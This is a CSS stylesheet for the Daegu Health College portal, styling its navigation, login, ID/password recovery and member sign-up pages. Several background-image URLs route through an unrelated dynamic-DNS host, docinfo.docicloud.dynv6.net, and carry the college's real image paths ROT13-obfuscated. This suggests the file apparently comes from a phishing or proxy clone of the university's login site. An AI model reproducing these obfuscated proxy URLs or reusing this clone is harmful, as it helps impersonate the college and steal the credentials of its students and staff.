@charset "UTF-8";

/* 대구보건대학교 공통 디자인 스타일시트 Rock */

/* 레이아웃 설정 */
body {
	min-width: 320px;
	background: #fff url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.qup.np.xe%2Squp%2Svzntrf%2Spbzzba%2Spbagragf_ot.tvs) center center;
}
#header {
	height: 87px;
	position: relative;
	z-index: 300;
	background-color: #fff;
	-webkit-box-shadow: 0 2px 5px rgba(0,0,0,.15);
	-moz-box-shadow: 0 2px 5px rgba(0,0,0,.15);
	box-shadow: 0 2px 5px rgba(0,0,0,.15);
}
#contents {
	position: relative;
	margin: 15px 12px;
	background-color: transparent;
}
#contents .contents {
	padding: 15px;
	background-color: #fff;
}
#footer {
	padding-bottom: 30px;
	background-color: #47484a;
}

/* Skip Navi */
.boxSkipNav {
	position: relative;
	z-index: 400;
}
a.accessibility {
	position: absolute;
	display: block;
	width: 100%;
	left: 0px;
	text-align: center;
	top: -10000px;
	font-size: 1.3em;
}
a.accessibility:hover, a.accessibility:active, a.accessibility:focus, a.accessibility.active {
	position: absolute;
	top: 0px;
	padding: 15px 0px;
	font-weight: bold;
	color: #FFF;
	background: none repeat scroll 0% 0% #888;
}

/* gnb */
#gnb {
	height: 100%;
	padding-left: 0;
	padding-right: 0;
}
/* 모바일 gnb */
.gnb-xs {
	display: none;
	min-width: 100%;
	min-height: 100%;
	z-index: 201;
}
.gnbOverlay {
	min-width: 100%;
	min-height: 100%;
	position: fixed;
	top: 0;
	left: 0;
	z-index: 202;
	background: transparent url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.qup.np.xe%2Squp%2Svzntrf%2Spbzzba%2Sot_tao_bireynl.cat) center center;
}
.boxGnb-xs {
	min-width: 300px;
	max-width: 80%;
	min-height: 100%;
	position: absolute;
	top: 0;
	right: 0;
	z-index: 203;
	background-color: #c4c4c4;
	-webkit-box-shadow: 2px 0 5px rgba(0,0,0,.25);
	-moz-box-shadow: 2px 0 5px rgba(0,0,0,.25);
	box-shadow: 2px 0 5px rgba(0,0,0,.25);
}
.boxGnbSearch {
	width: 100%;
	height: 87px;
	position: relative;
	z-index: 3;
	background: #fff url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.qup.np.xe%2Squp%2Svzntrf%2Spbzzba%2Spbagragf_ot.tvs) center center;
	-webkit-box-shadow: 0 2px 5px rgba(0,0,0,.15);
	-moz-box-shadow: 0 2px 5px rgba(0,0,0,.15);
	box-shadow: 0 2px 5px rgba(0,0,0,.15);
}
.gnbSearch {
	position: relative;
	padding-top: 24px;
	padding-right: 0;
}
.gnbSearch button {
	position: absolute;
	top: 35px;
	right: 15px;
	border: none;
}
.gnbSearch input[type='search'] {
	color: #777;
	font-size: 15px;
	width: 100%;
	height: 43px;
	padding: 10px 45px 10px 15px;
	border: 1px solid #dedede;
	background-color: #fff;
}
.closeGnb-xs {
	text-align: right;
	padding-top: 34px;
}
.boxGnbList {
	position: relative;
	z-index: 2;
	background-color: #fff;
}
.boxGnbList .panel {
	margin: 0;
	border-bottom: 1px solid #c4c4c4;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
	-webkit-box-shadow: none;
	-moz-box-shadow: none;
	box-shadow: none;
}
.boxGnbList .panel h2 {
	margin: 0;
}
.boxGnbList .panel h2 a {
	color: #474545;
	font-size: 17px;
	font-weight: bold;
	text-decoration: none;
	display: block;
	height: 40px;
	line-height: 40px;
	vertical-align: middle;
	padding-left: 20px;
	padding-right: 20px;
}
.boxGnbList .panel h2 a i {
	margin-top: 18px;
}
.boxGnbList .panel h2 a i.icon-arrow-down {
	display: none;
}
.boxGnbList .panel h2 a.collapsed i.icon-arrow-up {
	display: none;
}
.boxGnbList .panel h2 a.collapsed i.icon-arrow-down {
	display: block;
}
.boxGnbList .panel ul li {
	padding: 0;
	border-top: 1px solid #ededed;
}
.boxGnbList .panel ul li:nth-child(odd) {
	border-right: 1px solid #ededed;
}
.boxGnbList .panel ul li a {
	color: #474545;
	font-size: 13px;
	text-decoration: none;
	display: block;
	height: 40px;
	line-height: 40px;
	vertical-align: middle;
	padding-left: 20px;
}
.boxGnbSns {
	height: 100px;
	line-height: 100px;
	vertical-align: middle;
	padding-left: 20px;
	background-color: #ededed;
	border-top: 1px solid #fff;
}
.boxGnbBtm {
	padding-top: 30px;
	padding-left: 25px;
	border-top: 1px solid #b1b1b1;
}
.boxGnbBtm a {
	color: #545454;
	font-weight: bold;
	text-decoration: none;
	display: inline-block;
	margin-bottom: 20px;
	margin-right: 30px;
}
.boxGnbBtm a span {
	display: block;
}

/* 태블릿, PC gnb */
.boxGnb-lg {
	width: 100%;
}
.boxGnb-lg > li {
	width: 14.28571428571429%;
}
.boxGnb-lg > li > a {
	color: #474545;
	font-size: 17px;
	font-weight: bold;
	padding-top: 0;
	padding-bottom: 0;
	padding-left: 15px;
	padding-right: 10px;
	background-color: #fff !important;
}
.boxGnb-lg > li:hover > a,
.boxGnb-lg > li:focus > a,
.boxGnb-lg > li:active > a,
.boxGnb-lg > li.active > a {
	color: #a90056;
}
.boxGnbSub {
	display: none;
	width: 100%;
	position: absolute;
	top: 120px;
	left: 0;
	z-index: 200;
	background-color: #fff;
	border-top: 1px solid #e3e3e3;
}
.gnbSub {
	padding-left: 0;
	padding-right: 0;
}
.gnbSub > ul:before,
.gnbSub > ul:after {
	display: table;
	content: " ";
}
.gnbSub > ul:after {
	clear: both;
}
.gnbSub > ul {
	width: 100%;
	padding-top: 25px;
	padding-bottom: 35px;
}
.gnbSub > ul > li {
	height: 280px;
	position: relative;
	float: left;
	width: 14.2857%;
}
.gnbSub > ul > li .subLeftLine {
	height: 100%;
	border-left: 1px solid #ededed;
}
.gnbSub > ul > li a {
	display: block;
	color: #4f4f4f;
	font-size: 13px;
	line-height: 1em;
	letter-spacing: -1px;
	text-decoration: none;
	margin-top: 20px;
	margin-left: -1px;
	padding-top: 0;
	padding-bottom: 0;
	padding-left: 16px;
	padding-right: 5px;
}
.gnbSub > ul > li a span {
	line-height: 1.3em;
}
.gnbSub > ul > li a:first-child {
	margin-top: 0;
}
.gnbSub > ul > li a:hover,
.gnbSub > ul > li a:focus,
.gnbSub > ul > li a:active,
.gnbSub > ul > li a.active {
	color: #a90056;
	border-left: 3px solid #a90056;
	padding-left: 13px;
}
.gnbSubOverlay {
	display: none;
	min-width: 100%;
	min-height: 100%;
	position: fixed;
	top: 0;
	left: 0;
	z-index: 199;
	background: transparent url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.qup.np.xe%2Squp%2Svzntrf%2Spbzzba%2Sot_tao_bireynl.cat) center center;
}

/* 상단 */
/* #header 설정은 common.css */
.topLogo {
	padding-top: 27px;
	padding-right: 0;
	margin: 0;
}
.topLogo a {
	width: 100%;
	display: inline-block;
}
.topSearch {
	text-align: right;
	height: 87px;
	padding-top: 34px;
}
.topSearch button {
	display: inline-block;
}
.topSearch button:first-child {
	margin-right: 10px;
}
.topSearch a {
	color: #636262;
	font-size: 12px;
	text-decoration: none;
	display: inline-block;
	vertical-align: middle;
}
.topSearch span {
	display: inline-block;
	color: #e7e7e7;
	font-size: 11px;
}
.topSearch a.btnMobileLogin {
	font-size: 16px;
	line-height: 1em;
	display: inline-block;
}
.topSearch .boxMobileLogin {
	display: inline-block;
}
.topSearch .boxMobileLogin > a {
	color: #a80057;
	font-size: 16px;
	line-height: 1em;
}
.topSearch .btnWorld {
	display: inline-block;
	margin-left: 10px;
	margin-right: 5px;
	padding-right: 5px;
}
.boxTopMenu {
	text-align: right;
	padding-top: 9px;
	padding-right: 0;
}
.boxTopMenu a {
	color: #636262;
	font-size: 12px;
	text-decoration: none;
	display: inline-block;
	padding-left: 5px;
	padding-right: 5px;
}
.boxTopMenu .btnWorld {
	display: inline-block;
	padding-left: 10px;
	padding-right: 0px;
}
.boxTopMenu .btnWorld > a {
	padding: 12px 12px 13px 13px;
	border: 1px solid #dedede;
	-webkit-border-radius: 1px;
	-moz-border-radius: 1px;
	border-radius: 1px;
}
.boxTopMenu .btnWorld:focus > a,
.boxTopMenu .btnWorld.open > a {
	position: relative;
	z-index: 203;
	border-bottom-color: #fff;
}
.boxTopMenu .btnWorld:focus > a > i,
.boxTopMenu .btnWorld.open > a > i {
	background-position: -307px 0;
}
.boxMobileLogin.open ul.dropdown-menu,
.btnWorld.open ul.dropdown-menu {
	min-width: 100px;
	padding: 0;
	border-color: #dedede;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
	-webkit-box-shadow: none;
	-moz-box-shadow: none;
	box-shadow: none;
}
.boxTopMenu .btnWorld > ul > li {
	border-top: 1px solid #e9e9e9;
}
.boxTopMenu .btnWorld > ul > li:first-child {
	border-top: none;
}
.boxTopMenu .btnWorld > ul > li > a {
	color: #787878;
	font-size: 12px;
	line-height: 1em;
	padding: 16px 18px;
}
.boxTopMenu .btnWorld > ul > li:hover > a,
.boxTopMenu .btnWorld > ul > li:focus > a
.boxTopMenu .btnWorld > ul > li:active > a {
	color: #363636;
	background-color: #f8f8f8;
}
.boxTopMenu span {
	color: #e7e7e7;
	font-size: 11px;
}

/* 컨텐츠 하단 공통 영역 */
/* 설문 */
.contentsVote {
	padding-bottom: 15px;
}
.contentsVote .row {
	padding: 20px 25px;
	background-color: #fff;
}
.contentsVote .row > li {
	padding: 5px 0;
}
.contentsVote .row > li span.voteTitle {
	color: #f22678;
	font-size: 13px;
	font-weight: bold;
	display: block;
}
.contentsVote .row > li span.boxVoteRadio {
	display: block;
}
.contentsVote .row > li span.boxVoteRadio label {
	color: #6b6c6d;
	font-size: 13px;
	display: block;
}
.contentsVote .row > li span.boxVoteRadio label + label {
	margin-left: 0;
}
.voteTextarea {
	position: relative;
}
.voteTextarea button {
	color: #fff;
	font-size: 16px;
	font-weight: bold;
	width: 100px;
	height: 88px;
	display: inline-block;
	position: absolute;
	top: 5px;
	right: 0;
	background-color: #3e4041;
}
.voteTextarea textarea {
	color: #9a9a9a;
	font-size: 13px;
	width: 100%;
	height: 88px;
	resize: none;
	padding: 15px 115px 15px 15px;
	background-color: #fff;
	border: 1px solid #bfbfbf;
}
.voteInfo {
	color: #828182;
	font-size: 12px;
}
/* 모바일 하단 고정 링크 */
.contentsFooter {

}
.contentsFooter > .row {
	margin-bottom: 0;
}
.contentsFooter > .row > li {
	height: 50px;
	line-height: 50px;
	vertical-align: middle;
	background-color: #686c71;
}
.contentsFooter > .row > li:first-child {
	margin-bottom: 15px;
}
.contentsFooter > .row > li > button {
	color: #fff;
	font-weight: bold;
	width: 100%;
	text-align: left;
	padding-left: 25px;
	padding-right: 25px;
	position: relative;
}
.contentsFooter > .row > li > button i {
	position: absolute;
	top: 50%;
	right: 25px;
	margin-top: -3px;
}
.contentsFooter > .row > li .dropdown-menu {
	width: 100%;
	top: auto;
	bottom: 100%;
	padding-top: 18px;
	padding-bottom: 18px;
	-webkit-box-shadow: none;
	-moz-box-shadow: none;
	box-shadow: none;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border: 0;
	border-radius: 0;
}
.contentsFooter > .row > li .dropdown-menu li {
	height: 23px;
}
.contentsFooter > .row > li .dropdown-menu li a {
	color: #fff;
	font-size: 12px;
	height: 100%;
	display: block;
	padding: 0 23px;
}
.contentsFooter > .row > li .dropdown-menu li a span {
	height: 100%;
	display: block;
}
.contentsFooter > .row > li .dropdown-menu li a:hover,
.contentsFooter > .row > li .dropdown-menu li a:focus,
.contentsFooter > .row > li .dropdown-menu li a:active {
	background-color: #4d5054;
}
.contentsFooter > .row > li .dropdown-menu li a:hover span,
.contentsFooter > .row > li .dropdown-menu li a:focus span,
.contentsFooter > .row > li .dropdown-menu li a:active span {
	border-bottom: 1px solid #838588;
}
.contentsFooter > .row > li.boxDhcList:hover,
.contentsFooter > .row > li.boxDhcList:focus,
.contentsFooter > .row > li.boxDhcList:active {
	background-color: #debc36;
}
.contentsFooter > .row > li.boxDhcList .dropdown-menu {
	border-bottom: 1px solid #e5cb63;
	background-color: #dab41f;
}
.contentsFooter > .row > li.boxDhcList .dropdown-menu li a span {
	border-bottom: 1px solid #e5cb63;
}
.contentsFooter > .row > li.boxDhcFamily:hover,
.contentsFooter > .row > li.boxDhcFamily:focus,
.contentsFooter > .row > li.boxDhcFamily:active {
	background-color: #d74d7e;
}
.contentsFooter > .row > li.boxDhcFamily .dropdown-menu {
	border-bottom: 1px solid #e0759a;
	background-color: #d3396f;
}
.contentsFooter > .row > li.boxDhcFamily .dropdown-menu li a span {
	border-bottom: 1px solid #e0759a ;
}

/* 하단 */
.boxLinkSns {
	padding-top: 25px;
	padding-bottom: 25px;
	background-color: #545557;
	border-bottom: 1px solid #2f2f2f;
}
.boxLinkSns > .container > .row {
	padding-left: 25px;
	padding-right: 25px;
}
.boxLinkSns .boxLink > a {
	color: #b6b6b6;
	font-weight: bold;
	line-height: 1em;
	text-decoration: none;
	display: inline-block;
	margin-bottom: 8px;
	margin-right: 15px;
}
.boxLinkSns .boxSns {
	padding-top: 7px;
}
.boxLinkSns .boxFooterSns {
	padding-left: 13px;
}
.boxBtmTop {
	display: inline-block;
	margin-top: -17px;
	margin-bottom: -15px;
	background-color: #4d4e4f;
	border-left: 1px solid #474849;
	border-right: 1px solid #474849;
}
.boxBtmTop a {
	color: #b6b6b6;
	font-size: 12px;
	text-decoration: none;
	display: block;
	padding-left: 20px;
	padding-right: 20px;
	height: 53px;
	line-height: 53px;
	vertical-align: middle;
}
.boxLogoCopy .row {
	padding-left: 25px;
	padding-right: 25px;
}
.boxLogoCopy .row > div {
	vertical-align: top;
	padding-top: 25px;
	padding-left: 15px;
	padding-right: 15px;
}
.boxLogoCopy .boxCopy {
	color: #b6b6b6;
	font-size: 12px;
	line-height: 1em;
}
.boxLogoCopy .boxCopy address {
	margin-bottom: 5px;
}
.boxLogoCopy .boxCopy a {
	color: #b6b6b6;
	text-decoration: none;
}
.boxLogoCopy .boxCopy p {
	margin-bottom: 5px;
}

/* 로그인 */
.boxLoginWrap {
	margin-left: 0;
	margin-right: 0;
	border-top: 2px solid #2c2c2c;
	border-bottom: 1px solid #d3d3d3;
	background-color: #f8f8f8;
}
.loginTop,
.loginBody {
	padding-bottom: 40px;
}
.boxLoginWrap p {
	color: #747474;
}
.boxLoginTop .boxBtn {
	text-align: center;
}
.boxLoginTop .boxBtn a {
	width: 100%;
	padding: 10px 20px;
	background: #3d3e3f;
}
.boxLoginBody {
	border-top: 1px solid #e8e8e8;
}
.loginInput .form-group input {
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.boxLoginBtn {
	margin-top: 20px;
}
.btn-login-ok {
	color: #fefefe;
	font-size: 16px;
	font-weight: bold;
	width: 100%;
	padding: 10px 20px;
	background: #f62579;
}
.btn-login-ok:hover,
.btn-login-ok:focus,
.btn-login-ok:active {
	color: #fefefe;
}
.boxLoginLink {
	text-align: center;
	padding-top: 25px;
	padding-bottom: 25px;
	border-bottom: 1px solid #d3d3d3;
}
.boxLoginLink a {
	color: #747474;
	font-size: 14px;
	font-weight: bold;
	text-decoration: none;
	display: inline-block;
	margin-left: 30px;
}
.boxLoginLink span {
	color: #b6b6b6;
	font-size: 14px;
}
.boxLoginLink a:first-child {
	margin-left: 0;
	margin-right: 30px;
}
p.boxLoginAlert {
	font-size: 12px;
	margin-top: 30px;
	padding-left: 23px;
}
p.boxLoginAlert i {
	margin-left: -23px;
	margin-right: 5px;
}
p.boxLoginAlert span {
	color: #f62579;
}
.boxFindId table input,
.boxFindIdOk input {
	color: #747474;
	font-size: 13px;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.boxFindId table .control-label,
.boxFindIdOk .control-label{
	text-align: left;
	padding-right: 0;
}
.boxFindPw {
	margin-top: 30px;
}
.boxFindPw table td {
	height: 169px;
}

/* 회원가입 */
.boxMemberOrder {
	background-color: #f8f8f8;
	border: 1px solid #ddd;
}
.boxMemberOrder > div {
	color: #3d3d3d;
	font-size: 13px;
	line-height: 1em;
	font-weight: bold;
	text-align: center;
	width: 25%;
	position: relative;
	float: left;
	padding-top: 22px;
	padding-bottom: 22px;
	z-index: 2;
}
.boxMemberOrder > div.active {
	color: #fff;
	background: #f72b7d;
	z-index: 3;
}
.boxMemberOrder > div > .orderArrow {
	display: none;
	position: absolute;
	top: 0;
	z-index: 3;
}
.boxMemberOrder > div > .orderArrow.Normal {
	display: block;
	left: -15px;
	z-index: 2;
}
.boxMemberOrder > div.active > .orderArrow {
	display: block;
}
.boxMemberOrder > div > .orderArrow.Head {
	right: -14px;
}
.boxMemberOrder > div > .orderArrow.Footer {
	left: -14px;
}
.boxCert.Phone {
	margin-top: 20px;
}
.boxCert .boxBorder {
	text-align: center;
	display: block;
	padding-top: 30px;
	padding-bottom: 30px;
}
.boxCert .boxBorder .certText p:first-child {
	margin-top: 20px;
}
table.memberInput input[type="text"],
table.memberInput input[type="password"],
table.memberInput select {
	vertical-align: middle;
	height: 27px;
	padding: 3px 10px;
	background-color: #fff;
	border: 1px solid #ddd;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
table.memberInput select.inputPhone,
table.memberInput input.inputPhone {
	text-align: center;
	width: 80px
}
table.memberInput input.adressInput {
	width: 300px;
	margin-top: 5px;
}
table.memberInput .radio-inline {
	position: relative;
}
table.memberInput .checkbox {
	margin-top: 5px;
	margin-bottom: 5px;
}
table.memberInput .pull-left {
	width: 30%;
}
.boxMemberFinal {
	padding-top: 20px;
	padding-bottom: 20px;
	border-top: 2px solid #2c2c2c;
	border-bottom: 1px solid #d3d3d3;
	background-color: #f8f8f8;
}
.boxMemberFinal .alignLeft {
	text-align: center !important;
	margin-top: 10px;
}
.boxMemberFinal .alignLeft h2 {
	margin-top: 0;
	margin-bottom: 0;
}

/* 사이트맵 */
.boxSitemap a {
	color: inherit !important;
	text-decoration: none;
}
.boxSitemap table > tbody > tr > td > span.Divide {
	color: #E7E7E7;
	font-size: 11px;
	display: inline-block;
	padding: 0px 10px;
}
.personal{font-weight:900;color:#ff0;}